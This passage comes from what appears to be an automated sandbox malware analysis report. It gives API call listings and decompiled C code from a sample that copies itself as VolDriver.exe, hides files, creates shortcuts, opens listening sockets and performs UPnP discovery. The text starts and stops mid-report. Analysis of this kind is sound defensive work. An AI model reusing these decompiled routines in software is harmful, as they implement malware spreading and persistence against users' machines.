                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 00404DFE
                                                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404E0B
                                                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404E1C
                                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00404E2F
                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000002), ref: 00404E42
                                                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?), ref: 00404E4F
                                                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(00412F78,?,00000000), ref: 00404E67
                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000002), ref: 00404E7A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$wsprintf$ExistsPath$Attributes$CopyCreateDeleteDirectory_chkstk
                                                                                                                                                                                                                                                                  • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolDriver.exe$%s\*$,,A$shell32.dll$shell32.dll
                                                                                                                                                                                                                                                                  • API String ID: 3833403615-838585530
                                                                                                                                                                                                                                                                  • Opcode ID: fe551baaaed48645d904588363baa8fbaef1bbeba22468993180c2cc8ffb09a2
                                                                                                                                                                                                                                                                  • Instruction ID: ad37720c555eb0932884b17657b7396cff93d0f2d5161226f8479edb68281811
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe551baaaed48645d904588363baa8fbaef1bbeba22468993180c2cc8ffb09a2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76D15DB59102189BDB20DF60DD44BEA77B8BF44304F0085FAE109B6581D7B89BD9CF99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 389 404bb0-404bff CreateDirectoryW wsprintfW FindFirstFileW 390 404c05-404c19 lstrcmpW 389->390 391 404cdf-404ce2 389->391 392 404c31 390->392 393 404c1b-404c2f lstrcmpW 390->393 394 404cac-404cc2 FindNextFileW 392->394 393->392 395 404c33-404c7c wsprintfW * 2 393->395 394->390 398 404cc8-404cd9 FindClose RemoveDirectoryW 394->398 396 404c96-404ca6 MoveFileExW 395->396 397 404c7e-404c94 call 404bb0 395->397 396->394 397->394 398->391
                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00404BB0(WCHAR* _a4, char _a8) {
                                                                                                                                                                                                                                                                  				short _v524;
                                                                                                                                                                                                                                                                  				struct _WIN32_FIND_DATAW _v1116;
                                                                                                                                                                                                                                                                  				void* _v1120;
                                                                                                                                                                                                                                                                  				short _v1644;
                                                                                                                                                                                                                                                                  				short _v2164;
                                                                                                                                                                                                                                                                  				void* _t29;
                                                                                                                                                                                                                                                                  				void* _t60;
                                                                                                                                                                                                                                                                  				void* _t61;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t1 =  &_a8; // 0x40517b
                                                                                                                                                                                                                                                                  				CreateDirectoryW( *_t1, 0);
                                                                                                                                                                                                                                                                  				wsprintfW( &_v524, L"%s\\*", _a4);
                                                                                                                                                                                                                                                                  				_t61 = _t60 + 0xc;
                                                                                                                                                                                                                                                                  				_t29 = FindFirstFileW( &_v524,  &_v1116);
                                                                                                                                                                                                                                                                  				_v1120 = _t29;
                                                                                                                                                                                                                                                                  				if(_v1120 == 0xffffffff) {
                                                                                                                                                                                                                                                                  					return _t29;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					goto L1;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				do {
                                                                                                                                                                                                                                                                  					L1:
                                                                                                                                                                                                                                                                  					if(lstrcmpW( &(_v1116.cFileName), ".") != 0 && lstrcmpW( &(_v1116.cFileName), L"..") != 0) {
                                                                                                                                                                                                                                                                  						wsprintfW( &_v1644, L"%s\\%s", _a4,  &(_v1116.cFileName));
                                                                                                                                                                                                                                                                  						_t14 =  &_a8; // 0x40517b
                                                                                                                                                                                                                                                                  						wsprintfW( &_v2164, L"%s\\%s",  *_t14,  &(_v1116.cFileName));
                                                                                                                                                                                                                                                                  						_t61 = _t61 + 0x20;
                                                                                                                                                                                                                                                                  						if((_v1116.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                  							MoveFileExW( &_v1644,  &_v2164, 9);
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							E00404BB0( &_v1644,  &_v2164);
                                                                                                                                                                                                                                                                  							_t61 = _t61 + 8;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				} while (FindNextFileW(_v1120,  &_v1116) != 0);
                                                                                                                                                                                                                                                                  				FindClose(_v1120);
                                                                                                                                                                                                                                                                  				return RemoveDirectoryW(_a4);
                                                                                                                                                                                                                                                                  			}











                                                                                                                                                                                                                                                                  0x00404bbb
                                                                                                                                                                                                                                                                  0x00404bbf
                                                                                                                                                                                                                                                                  0x00404bd5
                                                                                                                                                                                                                                                                  0x00404bdb
                                                                                                                                                                                                                                                                  0x00404bec
                                                                                                                                                                                                                                                                  0x00404bf2
                                                                                                                                                                                                                                                                  0x00404bff
                                                                                                                                                                                                                                                                  0x00404ce2
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404c05
                                                                                                                                                                                                                                                                  0x00404c05
                                                                                                                                                                                                                                                                  0x00404c19
                                                                                                                                                                                                                                                                  0x00404c4a
                                                                                                                                                                                                                                                                  0x00404c5a
                                                                                                                                                                                                                                                                  0x00404c6a
                                                                                                                                                                                                                                                                  0x00404c70
                                                                                                                                                                                                                                                                  0x00404c7c
                                                                                                                                                                                                                                                                  0x00404ca6
                                                                                                                                                                                                                                                                  0x00404c7e
                                                                                                                                                                                                                                                                  0x00404c8c
                                                                                                                                                                                                                                                                  0x00404c91
                                                                                                                                                                                                                                                                  0x00404c91
                                                                                                                                                                                                                                                                  0x00404c7c
                                                                                                                                                                                                                                                                  0x00404cc0
                                                                                                                                                                                                                                                                  0x00404ccf
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32({Q@,00000000), ref: 00404BBF
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404BD5
                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00404BEC
                                                                                                                                                                                                                                                                  • lstrcmpW.KERNEL32(?,004105FC), ref: 00404C11
                                                                                                                                                                                                                                                                  • lstrcmpW.KERNEL32(?,00410600), ref: 00404C27
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404C4A
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404C6A
                                                                                                                                                                                                                                                                  • MoveFileExW.KERNEL32(?,?,00000009), ref: 00404CA6
                                                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(000000FF,?), ref: 00404CBA
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF), ref: 00404CCF
                                                                                                                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00404CD9
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                                                                                                                                                                                                  • String ID: %s\%s$%s\%s$%s\*${Q@
                                                                                                                                                                                                                                                                  • API String ID: 92872011-1064697655
                                                                                                                                                                                                                                                                  • Opcode ID: e840542102ed46a4bdf26edd650883959731639ebf51fd0069a4ee6c028d1a6c
                                                                                                                                                                                                                                                                  • Instruction ID: 6f6817d729ebc618073356bb80865953dc886d528bab8797446079342b48442e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e840542102ed46a4bdf26edd650883959731639ebf51fd0069a4ee6c028d1a6c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82317BB5504218EFDB20DFA0DD48EDA7378BB84301F0085B5F609A7585DB74DA99CF98
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 581 40e820-40e832 call 408820 584 40e9a6-40e9aa 581->584 585 40e838-40e870 GetSystemInfo InitializeCriticalSection CreateEventA 581->585 586 40e876-40e889 CreateIoCompletionPort 585->586 587 40e99f-40e9a4 call 40de00 585->587 586->587 588 40e88f-40e899 call 40b810 586->588 587->584 588->587 593 40e89f-40e8b7 WSASocketA 588->593 593->587 594 40e8bd-40e920 setsockopt htons bind 593->594 594->587 595 40e926-40e938 listen 594->595 595->587 596 40e93a-40e945 WSACreateEvent 595->596 596->587 597 40e947-40e957 WSAEventSelect 596->597 597->587 598 40e959-40e95f 597->598 599 40e961-40e97d call 40b8c0 598->599 600 40e97f-40e99e call 40b8c0 598->600 599->600
                                                                                                                                                                                                                                                                  C-Code - Quality: 45%
                                                                                                                                                                                                                                                                  			E0040E820(void* __esi) {
                                                                                                                                                                                                                                                                  				struct _SYSTEM_INFO _v36;
                                                                                                                                                                                                                                                                  				short _v40;
                                                                                                                                                                                                                                                                  				char _v77;
                                                                                                                                                                                                                                                                  				short _v82;
                                                                                                                                                                                                                                                                  				short _v86;
                                                                                                                                                                                                                                                                  				short _v90;
                                                                                                                                                                                                                                                                  				short _v92;
                                                                                                                                                                                                                                                                  				short _v94;
                                                                                                                                                                                                                                                                  				short _v96;
                                                                                                                                                                                                                                                                  				short _v98;
                                                                                                                                                                                                                                                                  				char _v100;
                                                                                                                                                                                                                                                                  				void* __edi;
                                                                                                                                                                                                                                                                  				intOrPtr* _t30;
                                                                                                                                                                                                                                                                  				void* _t33;
                                                                                                                                                                                                                                                                  				void* _t36;
                                                                                                                                                                                                                                                                  				intOrPtr _t37;
                                                                                                                                                                                                                                                                  				short _t39;
                                                                                                                                                                                                                                                                  				intOrPtr _t40;
                                                                                                                                                                                                                                                                  				intOrPtr* _t54;
                                                                                                                                                                                                                                                                  				void* _t56;
                                                                                                                                                                                                                                                                  				void* _t58;
                                                                                                                                                                                                                                                                  				void* _t59;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t30 = E00408820(0x4c);
                                                                                                                                                                                                                                                                  				_t54 = _t30;
                                                                                                                                                                                                                                                                  				_t59 = _t58 + 4;
                                                                                                                                                                                                                                                                  				if(_t54 == 0) {
                                                                                                                                                                                                                                                                  					return _t30;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					 *_t54 = 0x494f4350;
                                                                                                                                                                                                                                                                  					GetSystemInfo( &_v36);
                                                                                                                                                                                                                                                                  					_t45 = _v36.dwNumberOfProcessors;
                                                                                                                                                                                                                                                                  					_t3 = _t54 + 0x20; // 0x20
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_t54 + 4)) = _v36.dwNumberOfProcessors + _t45;
                                                                                                                                                                                                                                                                  					InitializeCriticalSection(_t3);
                                                                                                                                                                                                                                                                  					_t33 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                  					 *(_t54 + 0x10) = _t33;
                                                                                                                                                                                                                                                                  					if(_t33 == 0) {
                                                                                                                                                                                                                                                                  						L12:
                                                                                                                                                                                                                                                                  						E0040DE00(_t54);
                                                                                                                                                                                                                                                                  						return 0;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t36 = CreateIoCompletionPort(0xffffffff, 0, 0, 0);
                                                                                                                                                                                                                                                                  					 *(_t54 + 8) = _t36;
                                                                                                                                                                                                                                                                  					if(_t36 == 0) {
                                                                                                                                                                                                                                                                  						goto L12;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t37 = E0040B810(_t45);
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_t54 + 0xc)) = _t37;
                                                                                                                                                                                                                                                                  					if(_t37 == 0) {
                                                                                                                                                                                                                                                                  						goto L12;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					__imp__WSASocketA(2, 1, 6, 0, 0, 1);
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_t54 + 0x14)) = _t37;
                                                                                                                                                                                                                                                                  					if(_t37 == 0xffffffff) {
                                                                                                                                                                                                                                                                  						goto L12;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_v77 = 1;
                                                                                                                                                                                                                                                                  					__imp__#21(_t37, 0xffff, 4,  &_v77, 1);
                                                                                                                                                                                                                                                                  					_v94 = 0;
                                                                                                                                                                                                                                                                  					_v90 = 0;
                                                                                                                                                                                                                                                                  					_v86 = 0;
                                                                                                                                                                                                                                                                  					_v82 = 0;
                                                                                                                                                                                                                                                                  					_t39 = _v40;
                                                                                                                                                                                                                                                                  					_v96 = 2;
                                                                                                                                                                                                                                                                  					_v92 = _t39;
                                                                                                                                                                                                                                                                  					__imp__#9(_v36.dwOemId);
                                                                                                                                                                                                                                                                  					_v98 = _t39;
                                                                                                                                                                                                                                                                  					_t40 =  *((intOrPtr*)(_t54 + 0x14));
                                                                                                                                                                                                                                                                  					__imp__#2(_t40,  &_v100, 0x10);
                                                                                                                                                                                                                                                                  					if(_t40 == 0xffffffff) {
                                                                                                                                                                                                                                                                  						goto L12;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					__imp__#13( *((intOrPtr*)(_t54 + 0x14)), 0x7fffffff);
                                                                                                                                                                                                                                                                  					if(_t40 == 0xffffffff) {
                                                                                                                                                                                                                                                                  						goto L12;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					__imp__WSACreateEvent();
                                                                                                                                                                                                                                                                  					 *((intOrPtr*)(_t54 + 0x18)) = _t40;
                                                                                                                                                                                                                                                                  					if(_t40 == 0) {
                                                                                                                                                                                                                                                                  						goto L12;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					__imp__WSAEventSelect( *((intOrPtr*)(_t54 + 0x14)), _t40, 8);
                                                                                                                                                                                                                                                                  					if(_t40 == 0xffffffff) {
                                                                                                                                                                                                                                                                  						goto L12;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t56 = 0;
                                                                                                                                                                                                                                                                  					if( *((intOrPtr*)(_t54 + 4)) > 0) {
                                                                                                                                                                                                                                                                  						do {
                                                                                                                                                                                                                                                                  							E0040B8C0( *((intOrPtr*)(_t54 + 0xc)), 0, E0040E750, _t54, 0, 0);
                                                                                                                                                                                                                                                                  							_t56 = _t56 + 1;
                                                                                                                                                                                                                                                                  							_t59 = _t59 + 0x18;
                                                                                                                                                                                                                                                                  						} while (_t56 <  *((intOrPtr*)(_t54 + 4)));
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					E0040B8C0( *((intOrPtr*)(_t54 + 0xc)), 0, E0040E120, _t54, 0, 0);
                                                                                                                                                                                                                                                                  					return _t54;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}

























                                                                                                                                                                                                                                                                  0x0040e826
                                                                                                                                                                                                                                                                  0x0040e82b
                                                                                                                                                                                                                                                                  0x0040e82d
                                                                                                                                                                                                                                                                  0x0040e832
                                                                                                                                                                                                                                                                  0x0040e9aa
                                                                                                                                                                                                                                                                  0x0040e838
                                                                                                                                                                                                                                                                  0x0040e83d
                                                                                                                                                                                                                                                                  0x0040e843
                                                                                                                                                                                                                                                                  0x0040e849
                                                                                                                                                                                                                                                                  0x0040e84d
                                                                                                                                                                                                                                                                  0x0040e854
                                                                                                                                                                                                                                                                  0x0040e857
                                                                                                                                                                                                                                                                  0x0040e865
                                                                                                                                                                                                                                                                  0x0040e86b
                                                                                                                                                                                                                                                                  0x0040e870
                                                                                                                                                                                                                                                                  0x0040e99f
                                                                                                                                                                                                                                                                  0x0040e99f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e9a4
                                                                                                                                                                                                                                                                  0x0040e87e
                                                                                                                                                                                                                                                                  0x0040e884
                                                                                                                                                                                                                                                                  0x0040e889
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e88f
                                                                                                                                                                                                                                                                  0x0040e894
                                                                                                                                                                                                                                                                  0x0040e899
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e8ab
                                                                                                                                                                                                                                                                  0x0040e8b1
                                                                                                                                                                                                                                                                  0x0040e8b7
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e8cc
                                                                                                                                                                                                                                                                  0x0040e8d1
                                                                                                                                                                                                                                                                  0x0040e8dd
                                                                                                                                                                                                                                                                  0x0040e8e1
                                                                                                                                                                                                                                                                  0x0040e8e5
                                                                                                                                                                                                                                                                  0x0040e8e9
                                                                                                                                                                                                                                                                  0x0040e8ee
                                                                                                                                                                                                                                                                  0x0040e8f8
                                                                                                                                                                                                                                                                  0x0040e8fd
                                                                                                                                                                                                                                                                  0x0040e901
                                                                                                                                                                                                                                                                  0x0040e90d
                                                                                                                                                                                                                                                                  0x0040e912
                                                                                                                                                                                                                                                                  0x0040e917
                                                                                                                                                                                                                                                                  0x0040e920
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e92f
                                                                                                                                                                                                                                                                  0x0040e938
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e93a
                                                                                                                                                                                                                                                                  0x0040e940
                                                                                                                                                                                                                                                                  0x0040e945
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e94e
                                                                                                                                                                                                                                                                  0x0040e957
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e95a
                                                                                                                                                                                                                                                                  0x0040e95f
                                                                                                                                                                                                                                                                  0x0040e961
                                                                                                                                                                                                                                                                  0x0040e971
                                                                                                                                                                                                                                                                  0x0040e976
                                                                                                                                                                                                                                                                  0x0040e977
                                                                                                                                                                                                                                                                  0x0040e97a
                                                                                                                                                                                                                                                                  0x0040e961
                                                                                                                                                                                                                                                                  0x0040e98f
                                                                                                                                                                                                                                                                  0x0040e99e
                                                                                                                                                                                                                                                                  0x0040e99e

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 0040E843
                                                                                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(00000020), ref: 0040E857
                                                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040E865
                                                                                                                                                                                                                                                                  • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040E87E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B810: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040B82E
                                                                                                                                                                                                                                                                  • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 0040E8AB
                                                                                                                                                                                                                                                                  • setsockopt.WS2_32 ref: 0040E8D1
                                                                                                                                                                                                                                                                  • htons.WS2_32(?), ref: 0040E901
                                                                                                                                                                                                                                                                  • bind.WS2_32(?,00000004,00000010), ref: 0040E917
                                                                                                                                                                                                                                                                  • listen.WS2_32(?,7FFFFFFF), ref: 0040E92F
                                                                                                                                                                                                                                                                  • WSACreateEvent.WS2_32 ref: 0040E93A
                                                                                                                                                                                                                                                                  • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040E94E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B8C0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040B8E4
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B8C0: CreateThread.KERNEL32 ref: 0040B93F
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B8C0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040B97C
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B8C0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040B987
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B8C0: DuplicateHandle.KERNEL32(00000000), ref: 0040B98E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040B8C0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040B9A2
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1603358586-0
                                                                                                                                                                                                                                                                  • Opcode ID: 0f8a37c2dc507434d0e9753ac2c7b319f5b517dc92e0285aa238007e77300a48
                                                                                                                                                                                                                                                                  • Instruction ID: 90be5a7511d59d458e732dc8095ee9a9d8f3c027a684bd61592a782dd0d87169
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f8a37c2dc507434d0e9753ac2c7b319f5b517dc92e0285aa238007e77300a48
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 274191B4644702BBD2209F798C06F1AB7A4BF84710F108A3AF668E66D0E774E454C799
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 0040C2BA
                                                                                                                                                                                                                                                                  • htons.WS2_32(0000076C), ref: 0040C2F0
                                                                                                                                                                                                                                                                  • inet_addr.WS2_32(239.255.255.250), ref: 0040C2FF
                                                                                                                                                                                                                                                                  • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040C31D
                                                                                                                                                                                                                                                                    • Part of subcall function 00409260: htons.WS2_32(00000050), ref: 0040928D
                                                                                                                                                                                                                                                                    • Part of subcall function 00409260: socket.WS2_32(00000002,00000001,00000000), ref: 004092AD
                                                                                                                                                                                                                                                                    • Part of subcall function 00409260: connect.WS2_32(000000FF,?,00000010), ref: 004092C6
                                                                                                                                                                                                                                                                    • Part of subcall function 00409260: getsockname.WS2_32(000000FF,?,00000010), ref: 004092F8
                                                                                                                                                                                                                                                                  • bind.WS2_32(000000FF,?,00000010), ref: 0040C353
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(0040F578,00000000,?,00000010), ref: 0040C36C
                                                                                                                                                                                                                                                                  • sendto.WS2_32(000000FF,0040F578,00000000), ref: 0040C37B
                                                                                                                                                                                                                                                                  • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040C395
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1B0: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040C1FE
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1B0: Sleep.KERNEL32(000003E8), ref: 0040C20E
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1B0: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040C22B
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1B0: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040C241
                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1B0: StrChrA.SHLWAPI(?,0000000D), ref: 0040C26E
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                                                                                                                                                                                                  • String ID: 239.255.255.250
                                                                                                                                                                                                                                                                  • API String ID: 726339449-2186272203
                                                                                                                                                                                                                                                                  • Opcode ID: 5e9397e9030d774dfc7fde00dfa861a312c84f2fb1eeac03248b702da364cb9a
                                                                                                                                                                                                                                                                  • Instruction ID: 01a8e4080b6b474666e7a6222e05c129926e514e684bf986329747a216381769
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e9397e9030d774dfc7fde00dfa861a312c84f2fb1eeac03248b702da364cb9a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE4138B4E00208EBDB14DFE4E985BEEBBB5EF48304F108179E505B7290E7755A05CB59
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 44%
                                                                                                                                                                                                                                                                  			E0040D5C0(intOrPtr __edi, void* __esi) {
                                                                                                                                                                                                                                                                  				short _v8;
                                                                                                                                                                                                                                                                  				short _v14;
                                                                                                                                                                                                                                                                  				short _v18;
                                                                                                                                                                                                                                                                  				short _v22;
                                                                                                                                                                                                                                                                  				short _v24;
                                                                                                                                                                                                                                                                  				short _v26;
                                                                                                                                                                                                                                                                  				short _v28;
                                                                                                                                                                                                                                                                  				short _v30;
                                                                                                                                                                                                                                                                  				char _v33;
                                                                                                                                                                                                                                                                  				char _v52;
                                                                                                                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                                                                                                                  				void* _t21;
                                                                                                                                                                                                                                                                  				short _t24;
                                                                                                                                                                                                                                                                  				void* _t25;
                                                                                                                                                                                                                                                                  				void* _t30;
                                                                                                                                                                                                                                                                  				void* _t31;
                                                                                                                                                                                                                                                                  				intOrPtr _t38;
                                                                                                                                                                                                                                                                  				void* _t39;
